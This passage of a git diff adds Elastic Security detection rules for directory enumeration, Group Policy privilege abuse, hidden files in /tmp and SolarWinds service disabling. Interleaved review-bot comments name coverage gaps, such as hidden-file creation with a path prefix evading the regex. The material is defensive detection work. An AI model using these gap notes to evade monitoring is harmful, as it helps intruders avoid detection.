If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Threat: Lightning Framework", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1037", + "name": "Boot or Logon Initialization Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/", + "subtechnique": [ + { + "id": "T1037.004", + "name": "RC Scripts", + "reference": "https://attack.mitre.org/techniques/T1037/004/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 111 + }, + "id": "b910f25a-2d44-47f2-a873-aabdc0d355e6_111", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2.json b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2.json new file mode 100644 index 00000000000..bcd6a10dfe6 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2.json 
@@ -0,0 +1,93 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Identifies the execution of Linux built-in commands related to account or group enumeration. Adversaries may use account and group information to orient themselves before deciding how to act.", + "from": "now-119m", + "index": [ + "logs-endpoint.events.*", + "endgame-*", + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "interval": "60m", + "language": "eql", + "license": "Elastic License v2", + "name": "Discovery of Domain Groups", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action in (\"exec\", \"exec_event\", \"executed\", \"process_started\")\n and (\n process.name in (\"ldapsearch\", \"dscacheutil\") or (process.name == \"dscl\" and process.args : \"*-list*\")\n)\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "b92d5eae-70bb-4b66-be27-f98ba9d0ccdc", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Discovery", + "Rule Type: BBR", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Auditd Manager" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0007", + "name": "Discovery", + "reference": "https://attack.mitre.org/tactics/TA0007/" + }, + "technique": [ + { + "id": "T1069", + "name": "Permission Groups Discovery", + "reference": 
"https://attack.mitre.org/techniques/T1069/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "b92d5eae-70bb-4b66-be27-f98ba9d0ccdc_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_109.json b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_109.json new file mode 100644 index 00000000000..03fa1717662 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9554892-5e0e-424b-83a0-5aef95aa43bf_109.json 
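Review bot: The `dscacheutil` and `dscl` branches of this query can effectively never fire under `host.os.type == "linux"` — as far as I know both are macOS Directory Services utilities with no Linux counterpart, so on Linux hosts the rule reduces to `process.name == "ldapsearch"` and the `dscl ... -list` clause is dead weight that only obscures what is actually detected. Either drop those two names and document that the rule keys on `ldapsearch`, or, if macOS hosts were the intended target for them, change the OS filter and the `OS: Linux` tag together rather than leaving the mismatch. The description's "Linux built-in commands" is also inaccurate for `ldapsearch`, which is an OpenLDAP client package rather than a shell built-in; wording such as "Identifies the execution of Linux commands used for LDAP or directory-service account and group enumeration" would match the query as written.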
@@ -0,0 +1,91 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Detects the first occurrence of a modification to Group Policy Object Attributes to add privileges to user accounts or use them to add users as local admins.", + "index": [ + "winlogbeat-*", + "logs-system.*", + "logs-windows.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Group Policy Abuse for Privilege Addition", + "note": "## Triage and analysis\n\n### Investigating Group Policy Abuse for Privilege Addition\n\nGroup Policy Objects (GPOs) can be used to add rights and/or modify Group Membership on GPOs by changing the contents of an INF file named GptTmpl.inf, which is responsible for storing every setting under the Security Settings container in the GPO. This file is unique for each GPO, and only exists if the GPO contains security settings. Example Path: \"\\\\DC.com\\SysVol\\DC.com\\Policies\\{PolicyGUID}\\Machine\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf\"\n\n#### Possible investigation steps\n\n- This attack abuses a legitimate mechanism of Active Directory, so it is important to determine whether the activity is legitimate and the administrator is authorized to perform this operation.\n- Retrieve the contents of the `GptTmpl.inf` file, and under the `Privilege Rights` section, look for potentially dangerous high privileges, for example: SeTakeOwnershipPrivilege, SeEnableDelegationPrivilege, etc.\n- Inspect the user security identifiers (SIDs) associated with these privileges, and if they should have these privileges.\n\n### False positive analysis\n\n- Inspect whether the user that has done the modifications should be allowed to. 
The user name can be found in the `winlog.event_data.SubjectUserName` field.\n\n### Related rules\n\n- Scheduled Task Execution at Scale via GPO - 15a8ba77-1c13-4274-88fe-6bd14133861e\n- Startup/Logon Script added to Group Policy Object - 16fac1a1-21ee-4ca6-b720-458e3855d046\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- The investigation and containment must be performed in every computer controlled by the GPO, where necessary.\n- Remove the script from the GPO.\n- Check if other GPOs have suspicious scripts attached.\n", + "query": "event.code: \"5136\" and\n winlog.event_data.AttributeLDAPDisplayName:\"gPCMachineExtensionNames\" and\n winlog.event_data.AttributeValue:(*827D319E-6EAC-11D2-A4EA-00C04F79F83A* and *803E14A0-B4FB-11D0-A0D0-00A0C90F574B*)\n", + "references": [ + "https://github.com/atc-project/atc-data/blob/master/docs/Logging_Policies/LP_0025_windows_audit_directory_service_changes.md", + "https://labs.f-secure.com/tools/sharpgpoabuse" + ], + "related_integrations": [ + { + "package": "system", + "version": "^1.6.4" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.code", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeLDAPDisplayName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.AttributeValue", + "type": "unknown" + } + ], + "risk_score": 73, + "rule_id": "b9554892-5e0e-424b-83a0-5aef95aa43bf", + "setup": "## Setup\n\nThe 'Audit Directory Service Changes' audit policy must be configured (Success Failure).\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nPolicies >\nWindows Settings >\nSecurity Settings >\nAdvanced Audit Policies Configuration >\nAudit Policies >\nDS Access >\nAudit Directory Service Changes (Success,Failure)\n```\n", + "severity": "high", + "tags": [ + "Domain: Endpoint", 
+ "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Privilege Escalation", + "Data Source: Active Directory", + "Resources: Investigation Guide", + "Use Case: Active Directory Monitoring" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1484", + "name": "Domain Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/", + "subtechnique": [ + { + "id": "T1484.001", + "name": "Group Policy Modification", + "reference": "https://attack.mitre.org/techniques/T1484/001/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 109 + }, + "id": "b9554892-5e0e-424b-83a0-5aef95aa43bf_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_109.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_109.json new file mode 100644 index 00000000000..fe74f312798 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_109.json 
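Review bot: The "Response and remediation" steps in `note` do not match what this rule detects: the query keys on `gPCMachineExtensionNames` gaining the security-settings CSE GUIDs, which the triage text itself ties to Privilege Rights and Group Membership entries in `GptTmpl.inf`, yet the remediation says `Remove the script from the GPO.` and `Check if other GPOs have suspicious scripts attached.` — those lines look carried over from the Startup/Logon Script rule listed under Related rules. I would replace them with `- Revert the unauthorized entries in the GPO's GptTmpl.inf (Privilege Rights and Group Membership sections) and restore the intended settings.` and `- Check whether other GPOs received similar security-settings modifications.` Separately, the description claims to detect "the first occurrence" of the modification, but as written a plain `query`-type rule fires on every matching 5136 event with no new-terms or threshold component, so either the wording or the rule type should change so the two agree.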
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories.", + "false_positives": [ + "Certain tools may create hidden temporary files or directories upon installation or as part of their normal behavior. These events can be filtered by the process arguments, username, or process name values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Files and Directories via CommandLine", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\nprocess.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\nprocess.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\nnot process.name in (\"ls\", \"find\", \"grep\", \"git\", \"jq\", \"basename\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", + "setup": "\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic Defend is 
integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": 
"eql", + "version": 109 + }, + "id": "b9666521-4742-49ce-9ddc-b8e84c35acae_109", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_110.json b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_110.json new file mode 100644 index 00000000000..aefce80cae5 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9666521-4742-49ce-9ddc-b8e84c35acae_110.json 
@@ -0,0 +1,107 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Users can mark specific files as hidden simply by putting a \".\" as the first character in the file or folder name. Adversaries can use this to their advantage to hide files and folders on the system for persistence and defense evasion. This rule looks for hidden files or folders in common writable directories.", + "false_positives": [ + "Certain tools may create hidden temporary files or directories upon installation or as part of their normal behavior. These events can be filtered by the process arguments, username, or process name values." + ], + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "max_signals": 33, + "name": "Creation of Hidden Files and Directories via CommandLine", + "query": "process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and\nprocess.working_directory in (\"/tmp\", \"/var/tmp\", \"/dev/shm\") and\nprocess.args regex~ \"\"\"\\.[a-z0-9_\\-][a-z0-9_\\-\\.]{1,254}\"\"\" and\nnot process.name in (\"ls\", \"find\", \"grep\", \"git\", \"jq\", \"basename\")\n", + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.working_directory", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9666521-4742-49ce-9ddc-b8e84c35acae", + "setup": "## Setup\n\nThis rule requires data coming in from one of the following integrations:\n- Elastic Defend\n- Auditbeat\n\n### Elastic Defend Integration Setup\nElastic 
Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n### Auditbeat Setup\nAuditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations.\n\n#### The following steps should be executed in order to add the Auditbeat on a Linux System:\n- Elastic provides repositories available for APT and YUM-based distributions. 
Note that we provide binary packages, but no source packages.\n- To install the APT and YUM repositories follow the setup instructions in this [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setup-repositories.html).\n- To run Auditbeat on Docker follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-docker.html).\n- To run Auditbeat on Kubernetes follow the setup instructions in the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/running-on-kubernetes.html).\n- For complete \u201cSetup and Run Auditbeat\u201d information refer to the [helper guide](https://www.elastic.co/guide/en/beats/auditbeat/current/setting-up-and-running.html).\n\n#### Custom Ingest Pipeline\nFor versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the [guide](https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1564", + "name": "Hide Artifacts", + "reference": "https://attack.mitre.org/techniques/T1564/", + "subtechnique": [ + { + "id": "T1564.001", + "name": "Hidden Files and Directories", + "reference": "https://attack.mitre.org/techniques/T1564/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [] + } + ], + "timestamp_override": "event.ingested", + "type": 
"eql", + "version": 110 + }, + "id": "b9666521-4742-49ce-9ddc-b8e84c35acae_110", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_108.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_108.json new file mode 100644 index 00000000000..279ecbc4adc --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_108.json 
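Review bot: The `setup` text says this rule accepts data from Elastic Defend or Auditbeat, but `index` lists only `logs-endpoint.events.*` and the query requires `event.action == "exec"`, the Defend action name, so Auditbeat data (shipped to `auditbeat-*` with `executed`, as the b92d5eae rule elsewhere in this diff handles) is never evaluated. Either drop the Auditbeat section from `setup`, or, if Auditbeat support is intended, add `"auditbeat-*"` to `index` and widen the filter to `event.action in ("exec", "executed")`, updating `related_integrations` to match. A smaller detection gap: if I read EQL `regex~` correctly as a full-string match, `\.[a-z0-9_\-][a-z0-9_\-\.]{1,254}` only matches an argument that is itself a bare dotfile name, so `mkdir /tmp/.x` or `touch ./.x` run from those working directories slips past the rule — worth either stating in the description or allowing an optional directory prefix in the pattern. The `_109.json` version added in the same diff carries the identical query and setup, so whichever fix is chosen should be applied consistently.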
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SolarWinds Process Disabling Services via Registry", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\"\n ) and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\",\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9960fef-82c6-4816-befa-44745030e917", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 
8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 108 + }, + "id": "b9960fef-82c6-4816-befa-44745030e917_108", + "type": "security-rule" +} \ No newline at end of file 
diff --git a/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_109.json b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_109.json new file mode 100644 index 00000000000..d896bb77378 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/b9960fef-82c6-4816-befa-44745030e917_109.json 
@@ -0,0 +1,124 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a SolarWinds binary modifying the start type of a service to be disabled. An adversary may abuse this technique to manipulate relevant security services.", + "from": "now-9m", + "index": [ + "winlogbeat-*", + "logs-endpoint.events.registry-*", + "logs-windows.sysmon_operational-*", + "endgame-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "SolarWinds Process Disabling Services via Registry", + "query": "registry where host.os.type == \"windows\" and registry.path : (\n \"HKLM\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\",\n \"\\\\REGISTRY\\\\MACHINE\\\\SYSTEM\\\\*ControlSet*\\\\Services\\\\*\\\\Start\"\n ) and\n registry.data.strings : (\"4\", \"0x00000004\") and\n process.name : (\n \"SolarWinds.BusinessLayerHost*.exe\",\n \"ConfigurationWizard*.exe\",\n \"NetflowDatabaseMaintenance*.exe\",\n \"NetFlowService*.exe\",\n \"SolarWinds.Administration*.exe\",\n \"SolarWinds.Collector.Service*.exe\",\n \"SolarwindsDiagnostics*.exe\")\n", + "references": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + }, + { + "package": "windows", + "version": "^1.5.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "b9960fef-82c6-4816-befa-44745030e917", + "setup": "## Setup\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until 
version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Initial Access", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend", + "Data Source: Sysmon" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1562", + "name": "Impair Defenses", + "reference": "https://attack.mitre.org/techniques/T1562/", + "subtechnique": [ + { + "id": "T1562.001", + "name": "Disable or Modify Tools", + "reference": "https://attack.mitre.org/techniques/T1562/001/" + } + ] + }, + { + "id": "T1112", + "name": "Modify Registry", + "reference": "https://attack.mitre.org/techniques/T1112/" + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0001", + "name": "Initial Access", + "reference": "https://attack.mitre.org/tactics/TA0001/" + }, + "technique": [ + { + "id": "T1195", + "name": "Supply Chain Compromise", + "reference": "https://attack.mitre.org/techniques/T1195/", + "subtechnique": [ + { + "id": "T1195.002", + "name": "Compromise Software Supply Chain", + "reference": "https://attack.mitre.org/techniques/T1195/002/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 109 + }, + "id": "b9960fef-82c6-4816-befa-44745030e917_109", + "type": "security-rule" +} \ No newline at end of file 
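Review bot: The `process.name` wildcard list in `query` is the only thing tying the alert to SolarWinds — there is no `process.code_signature` clause and the rule ships neither a `false_positives` nor a `note` key — so a legitimately signed SolarWinds component that disables one of its own services during an upgrade alerts with no triage guidance attached. A `false_positives` entry such as `"SolarWinds upgrades or reconfiguration may legitimately set a service start type to disabled; verify the binary's signer and the affected service name."` would cover that without touching the query. The `_108` copy whose tail opens this chunk appears to carry the same text; its hunk starts outside the visible lines.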
